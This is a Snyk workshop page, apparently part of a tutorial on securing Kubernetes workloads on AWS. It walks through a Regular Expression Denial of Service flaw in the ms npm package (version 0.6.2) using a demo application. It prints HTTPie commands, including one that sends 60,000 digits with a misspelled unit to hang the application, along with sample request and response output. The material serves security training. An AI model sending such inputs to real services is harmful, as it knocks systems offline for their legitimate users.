Solutions
Solutions
Snyk
Docs Library
Blog
Partners
Home
Snyk Academy
Getting Started with Snyk
Snyk Open Source
Snyk Container
Partner Workshops
Amazon Web Services
Atlassian
CircleCI
Sign up for Snyk
Securing Kubernetes Workloads on AWS
Getting started
Create EKS cluster
CircleCI Configuration
config.yml
Kubernetes manifests
CircleCI Project
Test deployment
Interpret scan results
Exploits
Example 1
Example 2
Example 3
Conclusion
Docker
GitHub
Microsoft Azure
Red Hat
SpringOne Workshop
Integration Guide
IDE plugin
Snyk Connector
Powered by GitBook

Example 3

Our third example vulnerability is with the ms npm package. This is a module that allows easy conversion of various time formats into milliseconds. The issue here is that we are using ms@0.6.2 and this has a Regular Expression Denial of Service (ReDos) vulnerability.

What this package allows us to do is to take a string input and parse into milliseconds which our application will then use to send a reminder. For example:

To demonstrate this vulnerability, we will move to the terminal. Let's run the following command against our application:

echo 'content=Reboot server in 20 minutes' | http --form $GOOF_HOST/create -v

The result will be console output similar to this:

POST /create HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 36
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Host: elb.amazonaws.com
User-Agent: HTTPie/2.1.0
​
content=Reboot server in 20 minutes
​
HTTP/1.1 302 Found
Connection: keep-alive
Content-Length: 28
Content-Type: text/html; charset=utf-8
Date: Sat, 13 Jun 2020 21:20:16 GMT
ETag: W/"1c-41a86905"
Location: /
Vary: X-HTTP-Method-Override
X-Powered-By: Express
​
UmVib290IHNlcnZlciBbMjBtXQ==

A corresponding web result will look like this:

Now we will take the previous command but print the digit 5 a total of 60,000 times. This regular expression will take a non-linear amount of time to process an input. The longer the input, the longer the processing time. Let's run the following command

echo 'content=Reboot server in '\`printf "%.0s5" {1..60000}\`' minutes' | http --form $GOOF_HOST/create -v

The result here was surprisingly fast. However, what happens when the regular expression does not match? To illustrate this, let's take the same command and swap the s in minutes for an a instead. Type the following command:

echo 'content=Reboot server in '\`printf "%.0s5" {1..60000}\`' minutea' | http --form $GOOF_HOST/create -v

This command will take a while to process and result in a non-responsive application. If you try to add or remove tasks the application will not respond and you have blocked legitimate requests from processing.

Previous
Example 2
Next
Conclusion
Last updated 7 months ago